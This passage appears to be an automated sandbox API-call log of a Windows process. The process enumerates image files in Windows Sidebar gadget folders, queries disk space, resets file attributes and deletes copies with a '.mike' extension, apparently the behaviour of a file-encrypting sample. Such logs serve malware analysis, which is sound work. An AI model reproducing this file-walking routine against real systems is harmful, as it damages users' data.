ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_disabled.png", cAlternateFileName="")) returned 1 [0103.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e2fe6c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e2fe6c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x417, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_hover.png", cAlternateFileName="")) returned 1 [0103.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e2fe6c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e2fe6c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b9f71b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x45f, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_pressed.png", cAlternateFileName="")) returned 1 [0103.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e55fc9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e55fc9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b9f71b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x358, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_rest.png", cAlternateFileName="")) returned 1 [0103.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b101cb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b101cb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28bc5879, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="spacer_highlights.png", cAlternateFileName="")) returned 1 [0103.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36328, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b36328, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28bc5879, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4eac, dwReserved0=0x0, dwReserved1=0x0, cFileName="square.png", cAlternateFileName="")) returned 1 [0103.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b825e2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b825e2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28beb9d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_dot.png", cAlternateFileName="")) returned 1 [0103.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36328, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b36328, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28beb9d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1db, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_h.png", cAlternateFileName="")) returned 1 [0103.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b5c485, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b5c485, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c37c93, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_m.png", cAlternateFileName="")) returned 1 [0103.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b5c485, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b5c485, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c37c93, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_s.png", cAlternateFileName="")) returned 1 [0103.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b825e2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b825e2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c37c93, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4d87, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_settings.png", cAlternateFileName="")) returned 1 [0103.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ba873f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82ba873f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c5ddf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x519b, dwReserved0=0x0, dwReserved1=0x0, cFileName="system.png", cAlternateFileName="")) returned 1 [0103.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c1ab56, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c1ab56, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c5ddf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf3, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_dot.png", cAlternateFileName="")) returned 1 [0103.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bce89c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82bce89c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c83f4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_h.png", cAlternateFileName="")) returned 1 [0103.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bf49f9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82bf49f9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c83f4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_m.png", cAlternateFileName="")) returned 1 [0103.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bf49f9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82bf49f9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28c83f4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_s.png", cAlternateFileName="")) returned 1 [0103.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c40cb3, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c40cb3, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28caa0ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5a3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_settings.png", cAlternateFileName="")) returned 1 [0103.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c66e10, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c66e10, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28caa0ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4c3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad.png", cAlternateFileName="")) returned 1 [0103.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cd9227, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cd9227, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28cd020b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_dot.png", cAlternateFileName="")) returned 1 [0103.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c66e10, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c66e10, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28cd020b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_h.png", cAlternateFileName="")) returned 1 [0103.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c8cf6d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82c8cf6d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28ddab9d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x169, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_m.png", cAlternateFileName="")) returned 1 [0103.811] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cb30ca, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cb30ca, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e00cfb, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_s.png", cAlternateFileName="")) returned 1 [0103.811] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cff384, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cff384, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e00cfb, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5385, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_settings.png", cAlternateFileName="")) returned 1 [0103.811] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cff384, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cff384, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e00cfb, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5385, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_settings.png", cAlternateFileName="")) returned 0 [0103.811] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.811] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0103.811] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.811] CoTaskMemFree (pv=0x506980) [0103.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0103.812] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.812] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8538749b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8538749b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29088439, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4f1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0103.812] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0103.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290ae597, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x290ae597, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x290d46f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x23e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0103.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8057bdba, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8057bdba, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0103.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8538749b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8538749b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291b8f29, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0103.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0103.813] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.815] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0103.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png", lpFilePart=0x0) returned 0x3c [0103.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0103.825] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\drag.png.mike")) returned 1 [0103.828] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0103.828] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png", lpFilePart=0x0) returned 0x3c [0103.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0103.837] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\icon.png.mike")) returned 1 [0103.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", lpFilePart=0x0) returned 0x3c [0103.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", lpFilePart=0x0) returned 0x3c [0103.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", lpFilePart=0x0) returned 0x3c [0103.840] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0103.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", lpFilePart=0x0) returned 0x3c [0103.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.mike", lpFilePart=0x0) returned 0x41 [0103.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0103.845] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\logo.png.mike")) returned 1 [0103.847] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7301940, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x7301940, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.847] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8538749b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8538749b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29088439, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4f1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0103.847] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0103.847] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290ae597, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x290ae597, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x290d46f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x23e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0103.847] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8057bdba, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8057bdba, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0103.847] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8538749b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8538749b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291b8f29, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0103.847] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8538749b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8538749b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291b8f29, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0103.848] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.848] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0103.848] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.848] CoTaskMemFree (pv=0x506980) [0103.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0103.849] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, 